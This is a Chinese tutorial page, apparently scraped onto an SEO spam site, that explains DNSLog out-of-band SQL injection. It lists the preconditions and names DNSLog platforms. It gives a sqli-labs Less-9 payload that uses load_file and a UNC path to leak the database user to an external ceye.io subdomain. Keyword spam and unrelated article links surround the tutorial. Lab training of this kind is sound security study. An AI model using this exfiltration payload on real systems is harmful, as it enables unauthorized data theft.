当前位置: 首页 > wzjs >正文

网站免费的有没有今日新闻十大头条内容

网站免费的有没有,今日新闻十大头条内容,pc蛋蛋bc网站开发,wordpress导航不固定一、原理: 访问域名时,dns协议将我们访问的语句解析为ip地址,并将其记录在其日志中;在这个过程中,如果我们在语句中写入SQL注入的语句,那么在dns解析时会执行这些语句并通过concat将结果和域名一起记录在日…

一、原理:

访问域名时,dns协议将我们访问的语句解析为ip地址,并将其记录在其日志中;在这个过程中,如果我们在语句中写入SQL注入的语句,那么在dns解析时会执行这些语句并通过concat将结果和域名一起记录在日志中,这时我们就能直接去日志中查看敏感信息。

二、条件:

1.mysql的my.ini文件中的secure_file_priv参数值要为空,secure_file_priv=""

2.用户的权限必须是root

3.网站是windows服务器,因为load_file()基于UNC格式读取,是windows系统特有的

三、网站:

DNSLog Platform

CEYE - Monitor service for security testing

登录 - DNSlog System

DNSLOG Platform

DNSLog Platform -- DNSLog

四、示例:

以sqli-labs第9关为例:

http://127.0.0.1/sqli-labs-master/Less-9/
?id=1' and (select load_file(concat('\\\\',(select hex(user())),'
.s5vuxg.ceye.io\\abc')))--+

因为一些字符不能直接回显在网页上,需要hex()转为十六进制

最后再转回来即可

http://www.dtcms.com/wzjs/93252.html

相关文章:

  • 信阳哪里做网站谷歌浏览器下载手机版最新版
  • 建站代理赚钱吗bt磁力兔子引擎
  • 成品软件源码网站大全广州白云区疫情实时动态
  • 洛卡博网站谁做的宁波seo网络推广外包报价
  • 宁波建设厅网站天津seo外包
  • 阿里邮箱登录入口百度seo权重
  • 网站代码是多少打造龙头建设示范
  • 做外围网站代理合法不seochan是什么意思
  • 风险网站怎么解决方法厦门百度竞价推广
  • 公司网站制作汇报会拓客最有效方案
  • 亚马逊雨林深处网站seo方案案例
  • 济南网站建设培训学校网络营销计划包括哪七个步骤
  • 网站页面策划怎么做济南网站优化
  • 做照片书的网站网店推广的作用
  • 第三方编辑网站怎么做短期职业技能培训班
  • 郴州seo服务泰安网站seo推广
  • 攀枝花网站网站建设搜索指数查询平台
  • 学做网站要学什么软件长尾关键词什么意思
  • 常德论坛市民留言板长沙网站优化推广方案
  • 淘客个人网站怎么建设今日要闻
  • websocket做新闻网站网站流量统计工具有哪些
  • 网站建立的重要性网站建设的好公司
  • 手机网站建设开发seo基础入门
  • 亚马逊卖家做自己网站sem竞价托管费用
  • 知识产权网站建设互联网项目推广是什么
  • 网站建设金手指快速发免费广告电话号码
  • angularjs开发网站模板免费网络推广的方法
  • linux系统上的wordpress广州seo优化效果
  • 免费个人域名网站小程序推广50个方法
  • 淮安市建设工程施工图审查处网站品牌营销策划ppt